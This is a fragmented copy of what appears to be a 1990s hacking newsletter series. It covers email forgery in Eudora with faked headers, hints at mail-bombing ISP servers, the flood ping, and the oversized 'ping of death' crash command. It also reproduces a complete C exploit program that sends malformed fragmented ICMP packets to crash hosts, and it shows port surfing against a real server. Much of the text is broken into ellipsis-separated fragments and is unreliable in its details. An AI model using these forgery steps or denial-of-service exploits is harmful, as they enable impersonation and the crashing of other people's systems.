assume that even with forged email, the computer name at the end of the message ID is the computer on
which the email was written, and the computer that holds the record of who the guy was who forged it
...

Some of this Guide is clearly amateurish
...
Still, this learning to forge email on
Eudora illustrates many basic principles of email forgery
...
I managed to myself three different fake addresses in this email:
meinel@ayatollah
...
com

cpm@foo66
...
com, was “real
...

There is a legitimate use for this power
...
com
...
Here’s
how I put in those names
...
” This will pull down a menu
...
” For forging email, you can make every one of these entries fake
...

But guess what? When you send email you can put a phony host in there
...
ir
...
2
...
19970913214737
...
ir>
...
Just mail the sysadmin at
ayatollah
...
com>” and “Return-Path: ...
” I could have made them fake
...

5) Next, while still on the options pulldown, scroll down to “sending mail
...
With a little
experimentation you can find hundreds -- thousands -- millions -- of other computers that you can use to
send email on
...
I picked
kizmiaz
...
org for this one
...
fu
...
fu
...
14
...
160])
by Foo66
...
8
...
8
...
com>; Sat, 13 Sep 1997 21:54:34 -0600 (MDT)
Received: from Anteros (pmd08
...
com [198
...
176
...
fu
...
8
...
8
...
com>; Sat, 13 Sep 1997 20:54:20 -0700 (PDT)
How to Make Extra Headers and Fake the Path through the Internet
But maybe this doesn’t make a weird enough header for you
...

1) Open Windows Explorer by clicking “start,” then “programs,” then “Windows Explorer
...
Click on Eudora
...
Scroll down them to the files
...
ini
...
ini is now in Notepad and ready to edit
...
After the “=“
type in something like this:
extraheaders=received:from emout09
...
ayatollah
...
mx
...
com [198
...
11
...
com
(8
...
6/8
...
6) with ESMTP id MAA29967 for ...
You can add as
many extra headers to your email as you want by adding new lines that also start with “extra headers=”
...
”
******************************************************
You can go to jail warning: There still are ways for experts to tell where you sent this email from
...

*****************************************************************
Is it Possible to Mail Bomb Using Eudora?
The obvious way to mail bomb with Eudora doesn’t work
...
But the result will be only
one message going to that address
...
The mail daemons in common use on
the Internet such as sendmail, smail and qmail only allow one message to be sent to each address per email
...
Also, there is a totally trivial way to use Eudora
to send hundreds of gigantic attached files to one recipient, crashing the mail server of the victim’s ISP
...

But next time those Global kOS dudes try to snooker you into using one of their mail bomber programs
(they claim these programs will keep you safely anonymous but in fact you will get caught) just remember all
they are doing is packaging up stuff that anyone who knows two simple tricks could do much better with
Eudora
...
)
************************************************
Evil Genius Tip: This deadly mailbomber thingy is a feature, yes, honest-to-gosh intended FEATURE, of
sendmail
...

************************************************
The ease with which one may forge perfect mail and commit mail bombings which crash entire ISP mail
servers and even shut down Internet backbone providers such as has recently happened to AGIS may well
be the greatest threat the Internet faces today
...
Unfortunately, the
mail forgery problem is a deeply ingrained flaw in the Internet’s basic structure
...

If you figure it out, be a good guy and don’t abuse it, OK? Become one of us insiders who see the problem - and want to fix it rather than exploit it for greed or hatred
...
2 Number 1

Internet for Dummies -- skip this if you are a Unix wizard
...

____________________________________________________________
The six Guides to (mostly) Harmless Hacking of Vol
...
But if
you are like me, all those details of probing ports and playing with hypotheses and pinging down hosts gets
a little dizzying
...

Also, I have been wrestling with my conscience over whether to start giving you step-by-step instructions
on how to gain root access to other peoples’ computers
...
So don’t tell people how to do
it
...
” The little devil says, “But, Carolyn, tell people how to crack into root and they will
think you are KEWL!”
So here’s the deal
...
But the
instructions will leave a thing or two to the imagination
...

********* ********************
Technical tip: If you wish to become a *serious* hacker, you’ll need Linux (a freeware variety of Unix) on
your PC
...
It sure beats struggling around on someone else’s
computer only to discover that what you thought was root was a cleverly set trap and the sysadmin and FBI
laugh at you all the way to jail
...
You will need to reformat your hard disk
...
Backup, backup, backup!
*****************************
*****************************
You can go to jail warning: Crack into root on someone else’s computer and the slammer becomes a definite
possibility
...
They learn how to crack into computers for the intellectual challenge and to figure out
how to make computers safe from intruders
...

*********************************

Exciting notice: Is it too boring to just hack into your own Linux machine? Hang in there
...
net, a place where it will be legal to break into computers
...
Now does that sound like more phun than jail?
*****************************
So, let’s jump into our hacking basics tutorial with a look at the wondrous anarchy that is the Internet
...
That is because there are many
legal ways to hack on the Internet
...

Internet Basics
No one owns the Internet
...
It was never planned to b e what it is today
...

This anarchic system remains tied together because its users voluntarily obey some basic rules
...
If you understand, truly
understand Unix and TCP/IP (and UUCP), you will become a fish swimming in the sea of cyberspace, an
Uberhacker among hacker wannabes, a master of the Internet universe
...
These standards allow anyone to hook up a computer to the Internet, which then becomes
another node in this network of the Internet
...

Thes e links are now available in almost all parts of the world
...
There are two main ways to hook up to an on-line service
...
It requires either a point-to-point (PPP)
or SLIPconnection, which allows you to run pretty pictures with your Web browser
...

Or you can connect with a terminal emulator to an Internet host
...
1 “Terminal” program under the “Accessories” icon
...
It won’t give you pretty pictures
...
But if you know how to use this kind of
connection, it could even give you root access to that host
...
Since Unix is so easy to adapt to almost any computer, this means that almost any
computer may become an Internet host
...
Its Internet address is fantasia
...
sdl
...
edu
...
On other occasions the entry point
used may be pegasus
...
edu, which is an IBM RS 6000 Model 370
...

Any computer which can run the necessary software -- which is basically the Unix operating system -- has a
modem, and is tied to an Internet communications link, may become an Internet node
...
After setting it up with Linux you can
arrange with the ISP of your choice to link it permanently to the Internet
...

Each of these computers has an individual address which enables it to be reached through the Internet if
hooked up to a appropriate communications link
...

The communications links of the Internet are also owned and maintained in the same anarchic fashion as the
hosts
...
Communications links may be as simple as a phone
line, a wireless data link such as cellular digital packet data, or as complicated as a high speed fiber optic
link
...

Thus the net grows with no overall coordination
...
Alternatively, if the provider of the communications
link decides this host is, for example, a haven for spammers, it can cut this “rogue site” off of the Internet
...

The way most of these interconnected computers and communications links work is through the common
language of the TCP/IP protocol
...
" Each packet includes information on how to rout it, error correction, and the addresses of the
sender and recipient
...
Each
packet is then launched into the Internet
...

These packets may follow tortuous routes
...
Usually, however, the communications
links are not nearly so torturous
...

The strength of this packet-switched network is that most messages will automatically get through despite
heavy message traffic congestion and many communications links being out of service
...
It also may be difficult to reach desired computers if
too many communications links are unavailable at the time
...
The Internet is robust enough to
survive -- so its inventors claim -- even nuclear war
...
)
On the other hand, the headers on the packets that carry hacking commands will give away the account
information from which a hacker is operating
...

It is this tension between this power and robustness and weakness and potential for confusion that makes
the Internet a hacker playground
...
secnet
...

Moderator is Aleph One, who is a genuine Uberhacker
...
org with message “subscribe BUGTRAQ
...

History of Internet
As mentioned above, the Internet was born as a US Advanced Research Projects Agency (ARPA) effort in
1969
...
But because of its value in scientific research, the US National
Science Foundation (NSF) took it over in 1983
...
In April 1995 NSF cut the last apron strings
...

It just happens and grows out of the efforts of those who play with it and struggle with the software and
hardware
...
We now have a computer system with a life of its own
...
We also form a big part of the immune system of this exotic creature
...
What also happened was that ARPANET evolved into a being that has survived
the end of government funding without even a blip in its growth
...

The Internet has grown explosively, with no end in sight
...

A quarter of a century later, in 1984, it contained only 1000 hosts
...
Over the following 4 years it grew another tenfold to 1 million (1993)
...
There are
probably over 10 million now
...

In fact, one concern raised by the exponential growth in the Internet is that demand may eventually far
outrace capacity
...

For example, in 1988, Robert Morris, Jr
...
” This virus would make copies of itself on whatever computer it was on and then
send copies over communications links to other Internet hosts
...

Quickly the exponential spread of this virus made the Internet collapse from the communications traffic and
disk space it tied up
...
The Net was shut down and all viruses purged from its
host computers, and then the Net was put back into operation
...


There is some concern that, despite improved security measures (for example, "firewalls"), someone may
find a new way to launch a virus that could again shut down the Internet
...

But reestablishing a centralized control today like what existed at the time of the “Morris Worm” is likely to
be impossible
...

Perhaps the single most significant feature of today's Internet is this lack of centralized control
...
In fact, the difficulty of control became an issue as early
as its first year of operation as ARPANET
...
To
the surprise of ARPANET's managers, by the second year email accounted for the bulk of the
communication over the system
...
The proliferation of parallel communications links and hosts had by then
completely bypassed any possibility of centralized control
...

* email -- a way to send electronic messages
* Usenet -- forums in which people can post and view public messages
* telnet -- a way to login to remote Internet computers
* file transfer protocol -- a way to download files from remote Internet computers
* Internet relay chat -- real-time text conversations -- used primarily by hackers and other Internet old-timers
* gopher -- a way of cataloging and searching for information
...

As you port surfers know, there are dozens of other interesting but less well known services such as whois,
finger, ping etc
...
It consists
of "Web pages," which are like pages in a book, and links from specially marked words, phrases or symbols
on each page to other Web pages
...
"
This technique makes it possible to tie together many different documents which may be written by many
people and stored on many different computers around the world into one hypertext document
...

A URL is always of the form http://, where includes a domain name
which must be registered with an organization called InterNIC in order to make sure that two different Web
pages (or email addresses, or computer addresses) don't end up being identical
...

Here's how the hypertext of the World Wide Web works
...
" If this statement on the "Web page" is
highlighted, that means that a click of the reader's computer mouse will take him or her to a new Web page
with details
...


Some Web pages even offer ways to make electronic payments, usually through credit cards
...
Yet despite concerns with
verifiability of financial transactions, electronic commerce over the Web is growing fast
...
6 million in sales were conducted over the Web
...
Today, in 1996, the Web is jammed with commercial sites begging for your credit card
information
...
It is conceivable that, if the hurdle of verifiability may be overcome, that electronic cash
(often called ecash) may play a major role in the world economy, simplifying international trade
...

Examples of Web sites where one may obtain ecash include the Mark Twain Bank o f St
...
marktwain
...
digicash
...

The almost out-of-control nature of the Internet manifests itself on the World Wide Web
...
Links may be established automatically simply by programming
in the URLs of desired Web page links
...

A problem with the World Wide Web is how to find things on it
...
No one needs to ask permission of a central authority to put up a Web
page
...

Because of the value of knowing URLs, there now are many companies and academic institutions that offer
searchable indexes (located on the Web) to the World Wide Web
...
But because the Web is constantly growing and changing, there is no way to create a
comprehensive catalog of the entire Web
...
(The first use was to
allow people to remotely log in to their choice of one of the four computers on which ARPAnet was
launched in 1971
...
When broadcasted, ema il
serves to make announcements (one-way broadcasting), and to carry on discussions among groups of
people such as our Happy Hacker list
...

The two most popular program types used to broadcast to email discussion groups are majordomo and
listserv
...
One problem with email lists
is that there was no easy way for people new to these groups to join them
...

In 1979 these problems were addressed by the launch of Usenet
...
" Unlike an email discussion group, these posts are stored,
typically for two weeks or so, awaiting potential readers
...

With many Internet connection programs you can see the similarities between Usenet and email
...
Some programs such as Pine are sent up to send
the same message simultaneously to both email addresses and newsgroups
...

Now, here is a quick overview of the Internet basics we plan to cover in the next several issues of Guide to
(mostly) Harmless Hacking:
1
...
The reader is introduced to the concept of scripts which perform hacking functions
...

3
...

Extra attention is given to UUCP since it is so hackable
...
Internet Addresses, Domain Names and Routers
The reader learns how information is sent to the right places on the Internet, and how hackers can make it go
to the wrong places! How to look up UUCP hosts (which are not under the domain name system) is
included
...
Fundamentals of Elite Hacking: Ports, Packets and File Permissions
This section lets the genie of serious hacking out of the bottle
...
In fact, by the end of the
chapter the reader will have had the chance to practice several dozen techniques for gaining entry to other
peoples' computers
...
2 Number 2
Linux!
________________________________________

Unix has become the primo operating system of the Internet
...

True, Windows NT is coming up fast as a common Internet operating system, and is sooo wonderfully
buggy that it looks like it could become the number one favorite to crack into
...

So far we have assumed that you have been hacking using a shell account that you get through your
Internet Service Provider (ISP)
...
But you don't need to depend on your ISP for a machine that lets you play with Unix
...

***********************
Newbie note: Serial Line Internet Protocol (SLIP) and Point-to-Point Protocol (PPP) connections give you a
temporary Internet Protocol (IP) address that allows you to be hooked directly to the Internet
...
So if you can see pictures on the Web, you already have one of these available to you
...
Even if you are not breaking the law, a shell log
file that shows you doing lots of hacker stuph can be enough for some sysadmins to summarily close your
account
...
There are almost countless
variants of Unix that run on PCs, and a few for Macs
...

The three most common variations of Unix that run on PCs are Sun's Solaris, FreeBSD and Linux
...
Enough said
...
But you con't find many manuals or
newsgroups that cover FreeBSD
...
Most importantly, Linux is supported by many manuals,
news groups, mail lists and Web sites
...

************* ********
Historical note: Linux was created in 1991 by a group led by Linus Torvalds of the University of Helsinki
...
Under this agreement, Linux may be
redistributed to anyone along with the source code
...
But even if someone modifies the source code he or she may not claim copyright for anything
created from Linux
...
This arrangement is
known as a "copyleft
...
Linus Torvalds
and the many others who have contributed to Linux have done so from the joy of programming and a sense
of community with all of us who will hopefully use Linux in the spirit of good guy hacking
...


The kernel, like all types of Unix, is a multitasking, multi-user operating system
...
So a power user will probably want to boot up in Linux
and then be able to run DOS and Windows programs from Linux
...
;
* X (sometimes called X-windows), a graphical user interface
* utility programs such as the email reader Pine (my favorite) and Elm
Top ten reasons to install Linux on your PC:
1
...

2
...

3
...
sex
...

4
...

5
...
They will offer their sympathy instead
...
At the next Def Con you'll be able to say stuph like "so then I su -ed to his account and grepped all his files
for 'kissyface'
...

7
...

8
...

9
...

10
...

What types of Linux work best? It depends on what you really want
...
The Walnut Creek Linux 3
...

I like the Walnut Creek version best because with my brand X hardware, its autodetection feature was a lifesaver
...

2) Know as much as possible about what type of mother board, modem, hard disk, CD-ROM, and video card
you have
...

3) It works better to use hardware that is name-brand and somewhat out-of-date on your computer
...
And if your hardware is like mine - lots of Brand X and El Cheapo stuph, you can take a long time experimenting with what drivers will work
...
But we are all human, especially if following the advice of point 7)
...
The first time I successfully installed Linux, I finally hit on
something that worked by using the boot disk from one distribution with the CD-ROM for another
...

Add them all to your system and you will be set up to become beyond elite
...
I didn't like any of them! But they are better than nothing
...
But I found that what was
in the books did not exactly coincide with what was on the CD-ROMs
...
It may not make debugging go any faster, but at least you won't
care how hard it is
...
Oh, do I have 7 advisories up there? Forget number 7
...
Since everyone
else also suffers mightily when installing and using Linux, the Internet has an incredible wealth of resources
for the Linux -challenged
...

The best I have found is http://sunsite
...
edu:/pub/Linux/
...
unc
...

In the directory /pub/Linux/docs on sunsite
...
edu you'll find a number of other documents about Linux,
including the Linux INFO-SHEET and META-FAQ,
The Linux HOWTO archive is on the sunsite
...
edu Web site at: /pub/Linux/docs/HOWTO
...

You can get ``Linux Installation and Getting Started'' from sunsite
...
edu in /pub/Linux/docs/LDP/installguide
...

Now if you don't mind getting flamed, you may want to post questions to the amazing number of Usenet
news groups that cover Linux
...
os
...
advocacy
comp
...
linux
...
system
comp
...
linux
...
os
...
development
...
os
...
hardware
comp
...
linux
...
os
...
networking
comp
...
linux
...
redhat
...
os
...
uu
...
os
...
questions
comp
...
linux
...
os
...
misc

Benefits of Linux compared
Linux kernels, device drivers
Linux X Window System servers
Writing Linux applications
Hardware compatibility
Linux installation
Networking and communications
FAQs, How-To's, READMEs, etc
...
os
...
* instead
Usenet University helps you
Announcements important to Linux
Linux-specific topics

Want your Linux free? Tobin Fricke has pointed out that "free copies of Linux CD-ROMs are available the
Linux Support & CD Givaway web site at http://emile
...
ucsb
...
html
...
The project was seeded by Linux Systems
Labs, who donated 800 Linux CDs initially! Please remember to donate your Linux CD's when you are done
with them
...
They are usually under $20, which is an excellent investment
...
mit
...
unc
...
You should also visit the WONDERFUL linux
page at
http://sunsite
...
edu/linux, which has tons of information, as well as the
http://www
...
org/
...
redhat
...
caldera
...
"
How about Linux security? Yes, Linux, like every operating system, is imperfect
...
So if you want to find out how to secure your Linux system, or if you should come
across one of the many ISPs that use Linux and want to go exploring (oops, forget I
wrote that), here's where you can go for info:
ftp://info
...
org/pub/cert_advisories/CA -94:01
...
monitoring
...
cert
...
cis
...
edu/linux/linux-security/
http://www
...
com/bugtraq/
There is also help for Linux users on Internet Relay Chat (IRC)
...
net)
hosts a channel called #LinuxHelp on the Undernet IRC server
...
We may be
the blind leading the blind, but what
the heck!
____________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol
...
That means packets! Datagrams! Ping oversize packet denial of service exploit
explained
...
Don't try this at home
...

Now if this has been sounding like gibberish to you, relax
...
In fact, it is so simple that
if you use Windows 95, by the time you finish this article you will know a simple, one-line command that
you could use to crash many Internet hosts and routers
...
See if I
care! If one of those guys gets caught crashing thousands of Internet hosts and routers, not only will they
go to jail and get a big fine
...
This exploit is a no-brainer, one-line command
from Windows 95
...
So there is nothing elite
about this hack
...

**************************************************
**************************************************
NEWBIE NOTE: If packets, datagrams, and TCP/IP aren't exactly your bosom buddies yet, believe me, you
need to really get in bed with them in order to call yourself a hacker
...

When

we are done, you'll have the satisfaction of knowing you could wreak havoc on the Internet, but are too elite
to do so
...
The idea is that no transmission
technology is perfect
...
Something like "The bun is the lowest form of
wheat
...
" The third
whispers, "Rum is the lowest form of
drinking
...
It's really fun to find out how far the message can mutate as it goes around the circle
...
So the computer that sends
the email breaks it up into little pieces called datagrams
...
These wrapped up datagram packages are called "packets
...
Bit burps
...
It could take a long time until this giant packet
gets through intact
...
It will then tell the sending computer to retransmit
just the packets that messed up
...

TCP/IP stands for Transmission Control Protocol/Internet Protocol
...
Ping uses TCP/IP to make its packets
...
On the Internet there are some ten million computers that you
can ping
...
It is part of the Internet Control Message Protocol (ICMP), which is used to troubleshoot TCP/IP
networks
...
So if you get your ping
back, you know that computer is alive
...

But how does your computer know that the ping it just sent out actually echoed back from the targeted
computer? The datagram is the answer
...
If the returning ping holds this same
datagram, you kn ow it was your ping that just echoed back
...

When I give this command from Sun Release 4
...
"

**************************************
TECHNICAL TIP: Because of the destructive powers of ping, many Internet Service Providers hide the ping
program in their shell accounts where clueless newbies can't get their hands on it
...
They
may have ddiabled ping for ordinary users, but if you convince tech support you are a good Internet citizen
they may let you use it
...
But there is one thing you really need in order to hack: A SHELL ACCOUNT!!!!
The reason hackers make fun of people with America Online accounts is because that ISP doesn't give out
shell accounts
...
Once you are in the "shell" you can give commands to the operating system (which is
usually Unix) just
like you were sitting there at the console of one of your ISP's hosts
...
Call tech support with your ISP
to find out whether you have one, and how to get on it
...
And, guess what, whenever there is a command
you give over the Internet that has lots of variations, you can just about count on there being something
hackable in there
...
If your operating system will let you get away with giving the command:
-> ping -f hostname
it sends out a veritable flood of pings, as fast as your ISP's host machine can make them
...
It also puts a heavy load on
the network
...
This will generally keep the victim's computer too
busy to do anything else
...
However, the down side (from the attackers' viewpoint) is that
it keeps the attackers' computers tied up, too
...
Get caught doing this and you will be
lucky if the worst that happens is your on-line service provider closes your account
...

If you should start a flood ping kind of by accident, you can shut it off by holding down the control key and
pressing "c" (control-c)
...
The network address
that takes you
back to your own host computer is localhost (or 127
...
0
...
Here's an example of how I use localhost:
[65] ->telnet localhost
Trying 127
...
0
...

Connected to localhost
...


SunOS UNIX (slug)
login:
See, I'm back to the login sequence for the computer named "slug" all over
again
...
swcp
...
0
...
1 and log in using his or her
own user name and password for kewl warez! My ex
-husband Keith Henson did that to the Church of
Scientology
...
0
...
1 and discovered all their copyrighted scriptures
...
They were *so* sure he had their scriptures that they
took him to court
...

For a hilarious transcript or audio tape of this infamous court session, email hkhenson@cup
...
com
...
My hat is off to a superb hacker!
*******************************************
However, the oversize ping packet exploit you are about to learn will do even more damage to some hosts
than a gang of flood ping conspirators
...

The easiest way to do this hack is to run Windows 95
...

To do this, first set up your Windows 95 system so that you can make a PPP or SLIP connection with the
Internet using the Dialup Networking program under the My Computer icon
...
You must do it this way or this hack won't work
...


************************************
NEWBIE NOTE: If your Internet connection allows you to run a Web browser that shows pictures, you can
use that dialup number with your Windows 95 Dialup Networking program to get either a PPP or SLIP
connection
...
But don't run a browser or anything
...
" Open this DOS window
...
At this prompt you can type in a plain ordinary "ping"
command:
C:\windows\ping hostname
where "hostname" is the address of some Internet computer
...
nmia
...

Now if you happened to know the address of one of Saddam Hussein's computers, however, you might
want to give the command:
c:\windows \ping -l 65510 saddam_hussein's
...
mil
Now don't really do this to a real computer! Some, but not all, computers will crash and either remain hung or
reboot when they get this ping
...

Why? That extra added -l 65510 creates a giant datagram for the ping packet
...

If you want all the gory details on this ping exploit, including how to protect your computers from it, check
out
http://www
...
demon
...
uk/ping
...
For example, if
you run certain FreeBSD or Linux versions of Unix on your PC, you can run this program, which was posted
to the Bugtraq list
...
freebsd
...
org>
Subject: Ping exploit program
Since some people don't necessarily have Windows '95 boxes lying around, I (Fenner) wrote the following
exploit program
...
3, SunOS and
Solaris are
out
...
4BSD systems
...

Feel free to do with this what you want
...

* win95ping
...

* version 1
...
org> 22-Oct-1996
*
* This requires raw sockets that don't mess with the packet at all (other
* than adding the checksum)
...
3-based systems are out
...
4 systems (FreeBSD, NetBSD,
* OpenBSD, BSDI) will work
...

*
* The attack from the Win95 box looks like:
* 17:26:11
...
015079 cslwin95 > arkroyal: (frag 6144:1480@1480+)
* 17:26:11
...
017577 cslwin95 > arkroyal: (frag 6144:1480@4440+)
* 17:26:11
...
020112 cslwin95 > arkroyal: (frag 6144:1480@7400+)
* 17:26:11
...
022641 cslwin95 > arkroyal: (frag 6144:1480@10360+)
* 17:26:11
...
025140 cslwin95 > arkroyal: (frag 6144:1480@13320+)
* 17:26:11
...
027628 cslwin95 > arkroyal: (frag 6144:1480@16280+)
* 17:26:11
...
030100 cslwin95 > arkroyal: (frag 6144:1480@19240+)
* 17:26:11
...
032542 cslwin95 > arkroyal: (frag 6144:1480@22200+)
* 17:26:11
...
035018 cslwin95 > arkroyal: (frag 6144:1480@25160+)
* 17:26:11
...
037464 cslwin95 > arkroyal: (frag 6144:1480@28120+)
* 17:26:11
...
039966 cslwin95 > arkroyal: (frag 6144:1480@31080+)
* 17:26:11
...
042579 cslwin95 > arkroyal: (frag 6144:1480@34040+)
* 17:26:11
...
046276 cslwin95 > arkroyal: (frag 6144:1480@37000+)
* 17:26:11
...
048478 cslwin95 > arkroyal: (frag 6144:1480@39960+)
* 17:26:11
...
050929 cslwin95 > arkroyal: (frag 6144:1480@42920+)
* 17:26:11
...
053398 cslwin95 > arkroyal: (frag 6144:1480@45880+)
* 17:26:11
...
056347 cslwin95 > arkroyal: (frag 6144:1480@48840+)
* 17:26:11
...
058357 cslwin95 > arkroyal: (frag 6144:1480@51800+)
* 17:26:11
...
060787 cslwin95 > arkroyal: (frag 6144:1480@54760+)
* 17:26:11
...
063247 cslwin95 > arkroyal: (frag 6144:1480@57720+)
* 17:26:11
...
066252 cslwin95 > arkroyal: (frag 6144:1480@60680+)
* 17:26:11
...
068220 cslwin95 > arkroyal: (frag 6144:1480@63640+)
* 17:26:11
...
h>
#include ...
h>
#include ...
h>
#include ...
h>
#include ...

* This is probably only Linux
...
s_addr = inet_addr(argv[1])) == -1) {
fprintf(stderr, "%s: unknown host\n", argv[1]);
}
} else {

bcopy(hp->h_addr_list[0], &ip->ip_dst
...
s_addr = 0;
/* kernel fills in */
dst
...
sin_family = AF_INET;
icmp ->icmp_type = ICMP_ECHO;
icmp ->icmp_code = 0;
icmp ->icmp_cksum = htons(~(ICMP_ECHO << 8));
/* the checksum of all 0's is easy to compute */
for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) {
ip->ip_off = FIX(offset >> 3);
if (offset < 65120)
ip->ip_off |= FIX(IP_MF);
else
ip->ip_len = FIX(418); /* make total 65538 */
if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
sizeof dst) < 0) {
fprintf(stderr, "offset %d: ", offset);
perror("sendto");
}
if (offset == 0) {
icmp ->icmp_type = 0;
icmp ->icmp_code = 0;
icmp ->icmp_cksum = 0;
}
}
}
(End of Fenner's ping exploit message
...
On the other hand, if you were to do it to an Internet
host in Iraq
...
If you have a shell account, you can find
out lots of stuph about ping by giving the command:
man ping

In fact, you can get lots of details on any Unix command with "man
...
See
if I care when you get busted
...
2 Number 4
More intro to TCP/IP: port surfing! Daemons! How to get on almost any computer without logging in and
without breaking the law
...

____________________________________________________________
A few days ago I had a lady friend visiting
...
However, she is taking a
class on personal computers at a community college
...
So I decided to introduce her to port surfing
...

Port surfing takes advantage of the structure of TCP/IP
...
One of the basic principles of Unix (the most popular
operating system on the Internet) is to assign a “port” to every function that one computer might command
another to perform
...


************************
Newbie note #1: A computer port is a place where information goes in or out of it
...

But an Internet host computer such as callisto
...
edu has many more ports than a typical home computer
...
Now these are not all physical ports, like a keyboard or RS232 serial
port (for your modem)
...

A “service” is a program running on a “port
...
Happy hacking!
************************
So if you want to read a Web page, your browser contacts port number 80 and tells the computer that
manages that Web site to let you in
...

OK, big deal
...
Many -- most -- computers on the Internet will let you
do some things with them without needing a password,
However, the essence of hacking is doing things that aren’t obvious
...
One way you can move a step up from the run of the mill computer user is to learn how to port
surf
...


Now if you are a lazy hacker you can use canned hacker tools such as Satan or Netcat
...
They automatically scan your
target computers
...
They will also probe these ports for presence of
daemons with know security flaws, and tell you what they are
...
It is a program that runs in the
background on many (but not all) Unix system ports
...
If you find a
daemon on a port, it’s probably hackable
...

********************************
However, there are several reasons to surf ports by hand instead of automatically
...
Probing manually you get a gut feel for how the daemon running on that port
behaves
...

2) You can impress your friends
...
I can run programs, too
...
Most hacking exploits are just lamerz running programs they picked up from some BBS or ftp site
...
And you can help them
play with daemons, too, and give them a giant rush
...
There are only a few hundred hackers -- at most -- who discover new stuph
...
Boring
...

Now let me tell you what my middle aged friend and I discovered just messing around
...
Hey, let’s go for the big time!
So how do you find a big kahuna computer on the Internet? We started with a domain which consisted of a
LAN of PCs running Linux that I happened to already know about, that is used by the New Mexico Internet
Access ISP: nmia
...

*****************************
Newbie Note # 3: A domain is an Internet address
...

*****************************
So to do this we first logged into my shell account with Southwest Cyberport
...
com
New Mexico Internet Access (NMIA-DOM)
2201 Buena Vista SE
Albuquerque, NM 87106
Domain Name: NMIA
...
COM
(505) 877-0617
Record last updated on 11-Mar-94
...

Domain servers in listed order:
NS
...
COM
GRANDE
...
ORG

198
...
166
...
121
...
2

Now it’s a good bet that grande
...
org is serving a lot of other Internet hosts beside nmia
...
Here’s how
we port surf our way to find this out:
[67] ->telnet grande
...
org 15
Trying 129
...
1
...

Connected to grande
...
org
...

TGV MultiNet V3
...
1
Product
License Authorization
Expiration Date
---------------- --------------------------MULTINET
Yes
A-137-1641
(none)
NFS-CLIENT
Yes
A-137-113237
(none)

*** Configuration for file "MULTINET:NETWORK_DEVICES
...
NM
...
59
...
24(1569) ESTABLISHED
TCP
0 0 GRANDE
...
ORG(POP3) 164
...
201
...
NM
...
121
...
5(TELNET) ESTABLISHED
TCP
0 0 GRANDE
...
ORG(TELNET) AVATAR
...
ORG(3141) ESTABLISHED
TCP
0 0 *(NAMESERVICE)
*(*)
LISTEN
TCP
0 0 *(TELNET)
*(*)
LISTEN
TCP
0 0 *(FTP)
*(*)
LISTEN
TCP
0 0 *(FINGER)
*(*)
LISTEN
TCP
0 0 *(NETSTAT)
*(*)
LISTEN
TCP
0 0 *(SMTP)
*(*)
LISTEN
TCP
0 0 *(LOGIN)
*(*)
LISTEN
TCP
0 0 *(SHELL)
*(*)
LISTEN
TCP
0 0 *(EXEC)
*(*)
LISTEN
TCP
0 0 *(RPC)
*(*)
LISTEN
TCP
0 0 *(NETCONTROL)
*(*)
LISTEN
TCP
0 0 *(SYSTAT)
*(*)
LISTEN
TCP
0 0 *(CHARGEN)
*(*)
LISTEN
TCP
0 0 *(DAYTIME)
*(*)
LISTEN
TCP
0 0 *(TIME)
*(*)
LISTEN
TCP
0 0 *(ECHO)
*(*)
LISTEN
TCP
0 0 *(DISCARD)
*(*)
LISTEN

TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
UDP

0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0

0 *(PRINTER)
*(*)
LISTEN
0 *(POP2)
*(*)
LISTEN
0 *(POP3)
*(*)
LISTEN
0 *(KERBEROS_MASTER) *(*)
LISTEN
0 *(KLOGIN)
*(*)
LISTEN
0 *(KSHELL)
*(*)
LISTEN
0 GRANDE
...
ORG(4174) OSO
...
ORG(X11)
ESTABLISHED
0 GRANDE
...
ORG(4172) OSO
...
ORG(X11)
ESTABLISHED
0 GRANDE
...
ORG(4171) OSO
...
ORG(X11)
ESTABLISHED
0 *(FS)
*(*)
LISTEN
0 *(NAMESERVICE)
*(*)
0 127
...
0
...
NM
...
0
...
1(KERBEROS) *(*)
0 GRANDE
...
OR(KERBEROS) *(*)
0 *(*)
*(*)
0 *(SNMP)
*(*)
0 *(RPC)
*(*)
0 *(DAYTIME)
*(*)
0 *(ECHO)
*(*)
0 *(DISCARD)
*(*)
0 *(TIME)
*(*)
0 *(CHARGEN)
*(*)
0 *(TALK)
*(*)
0 *(NTALK)
*(*)
0 *(1023)
*(*)
0 *(XDMCP)
*(*)

MultiNet registered RPC programs:
Program Version Protocol Port
------- ------- -------- ---PORTMAP
2
TCP
111
PORTMAP
2
UDP
111

MultiNet IP Routing tables:
Destination
Gateway
Flags
Refcnt Use Interface MTU
---------------------------- ----- --------- ---198
...
167
...
NM
...
45
...
1
ENSS365
...
ORG Up,Gateway,H 0 4162 se0
1500
205
...
138
...
NM
...
127
...
1 ENSS365
...
ORG Up,Gateway,H 0 298 se0
1500
127
...
0
...
0
...
1
Up,Host 5 1183513 lo0
4136
198
...
167
...
NM
...
132
...
2 ENSS365
...
ORG Up,Gateway,H 0 729 se0
1500
207
...
56
...
NM
...
97
...
2 ENSS365
...
ORG Up,Gateway,H 0 2641 se0
1500
194
...
74
...
NM
...
252
...
2 ENSS365
...
ORG Up,Gateway,H 0 109 se0
1500
205
...
243
...
NM
...
213
...
2 ENSS365
...
ORG Up,Gateway,H 0 4
se0
1500

202
...
224
...
NM
...
132
...
3 ENSS365
...
ORG Up,Gateway,H 0 1100 se0
1500
198
...
196
...
NM
...
205
...
3 ENSS365
...
ORG Up,Gateway,H 0 78
se0
1500
202
...
107
...
NM
...
59
...
4 LAWRII
...
ORG Up,Gateway,H 0 82
se0
1500
128
...
157
...
NM
...
45
...
6 ENSS365
...
ORG Up,Gateway,H 0 3
se0
1500
128
...
50
...
NM
...
170
...
8 ENSS365
...
ORG Up,Gateway,H 0 1451 se0
1500
128
...
128
...
NM
...
7
...
9 ENSS365
...
ORG Up,Gateway,H 0 14
se0
1500
204
...
57
...
NM
...
74
...
75 ENSS365
...
ORG Up,Gateway,H 0 10117 se0
1500
206
...
65
...
NM
...
219
...
81 ENSS365
...
ORG Up,Gateway,H 0 547 se0
1500
204
...
246
...
NM
...
45
...
21 ENSS365
...
ORG Up,Gateway,H 0 97
se0
1500
206
...
168
...
